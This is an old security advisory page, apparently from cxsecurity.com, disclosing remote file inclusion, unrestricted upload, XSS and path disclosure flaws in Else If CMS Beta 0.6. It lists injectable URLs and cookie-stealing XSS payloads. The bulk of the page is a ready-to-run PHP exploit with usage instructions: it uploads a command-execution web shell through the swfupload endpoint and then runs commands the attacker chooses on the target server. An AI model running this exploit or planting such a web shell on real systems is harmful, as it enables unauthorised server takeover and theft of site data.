Else If cms Multiple Remote vulnerabilities

2007.10.09
Credit: HACKERS PAL
Risk: High
Local: No
Remote: Yes
CWE: N/A

Hello,, ELSEIF CMS Tested on "Else If version Beta 0.6" Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : security (at) soqor (dot) net [email concealed] These Are Examples .. iam tiered fetching the injected files :) Remote File inclusion elseif/contenus.php?contenus=[Shell] elseif/utilisateurs/votes.php?tpelseifportalrepertoire=[Shell] elseif/utilisateurs/espaceperso.php?tpelseifportalrepertoire=[Shell] elseif/utilisateurs/enregistrement.php?tpelseifportalrepertoire=[Shell] elseif/utilisateurs/commentaire.php?tpelseifportalrepertoire=[Shell] elseif/utilisateurs/coeurusr.php?tpelseifportalrepertoire=[Shell] elseif/moduleajouter/articles/fonctions.php?tpelseifportalrepertoire=[Sh ell] elseif/moduleajouter/articles/usrarticles.php?corpsdesign=[Sh3ll] elseif/moduleajouter/depot/usrdepot.php?corpsdesign[Sh3ll] elseif/moduleajouter/depot/fonctions.php?tpelseifportalrepertoire=[Shell ] Remote File Upload Ability elseif/externe/swfupload/upload.php Xss example elseif/utilisateurs/vousetesbannis.php?repertimage="><script>alert(docum ent.cookie);</script><" elseif/utilisateurs/votesresultats.php?elseifvotetxtresultatduvote=<scri pt>alert(document.cookie);</script> elseif/moduleajouter/depot/adminforum.php?elseifforumtxtmenugeneraledufo rum=<script>alert(document.cookie);</script> Full Path elseif/utilisateurs/votesresultats.php Upload Exploits: #!/usr/bin/php -q -d short_open_tag=on <? /* /* ELSE IF CMS Multiple vulnerabilities /* This exploit should allow you to Upload Shell .. /* By : HACKERS PAL /* WwW.SoQoR.NeT */ echo(' /**********************************************/ /* ELSEIF CMS Shell Upload Exploit */ /* by HACKERS PAL <security (at) soqor (dot) net [email concealed]> */ /* site: http://www.soqor.net */'); if ($argc<4) { print_r(' /* -- */ /* Usage: php '.$argv[0].' host path cmd /* Example: */ /* php '.$argv[0].' localhost /freewps/ id /**********************************************/ '); die; } error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); Function get_page($url) { if(function_exists("file_get_contents")) { $contents = file_get_contents($url); } else { $fp=fopen("$url","r"); while($line=fread($fp,1024)) { $contents=$contents.$line; } } return $contents; } function connect($packet) { global $host, $port, $html; $con=fsockopen(gethostbyname($host),$port); if (!$con) { echo '[-] Error - No response from '.$host.':'.$port; die; } fputs($con,$packet); $html=''; while ((!feof($con)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($con,1); } GLOBAL $html; fclose($con); } $i=0; $data=""; function add_data($name,$value,$type="no",$filename) { GLOBAL $data,$i; if($type=="file") { $data.="-----------------------------7d62702f250530 Content-Disposition: form-data; name=\"$filename\"; filename=\"$name\"; Content-Type: text/plain $value "; } elseif($type=="init") { $data.="-----------------------------7d62702f250530--"; } elseif($type=="clean") { $data=""; } else { $data.="-----------------------------7d62702f250530 Content-Disposition: form-data; name=\"$name\"; Content-Type: text/plain $value "; } } $host=$argv[1]; $path=$argv[2]; $cmd=$argv[3]; $port=80; $cmd=urlencode($cmd); $p='http://'.$host.':'.$port.$path; Echo "\n[+] Trying to Upload File"; $cookie="Master=HACKERS20%PAL"; $contents='<?php $cmd=($_GET[cmd])?$_GET[cmd]:$_POST[cmd]; system($cmd); ?>'; add_data("soqor.php",$contents,"file","Filedata"); add_data('','',"init"); $packet="POST ".$p."elseif/externe/swfupload/upload.php?&-269001946=1&-834358190=1 HTTP/1.0\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; $packet.="Referer: http://".$host.$path."profile.php?mode=editprofile\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cache-Control: no-cache\r\n"; $packet.="Cookie: ".$cookie."\r\n\r\n"; $packet.=$data; connect($packet); $dir=$p."elseif/image/logodusite/soqor.php"; $httml = get_page($dir); if (eregi("Cannot execute a blank command",$httml)) { echo "\n[+] Successfully uploaded ...\n[+] Go To http://".$p."?cmd=$cmd\n[+] For your own commands.. \n[+] The Result Of The Command\n"; Echo get_page($p."upload/soqor.php?cmd=".$cmd); } else { echo "\n[-] Unable to Upload File\n[-] Exploit Failed"; } echo ("\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/"); ?> # WwW.SoQoR.NeT


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top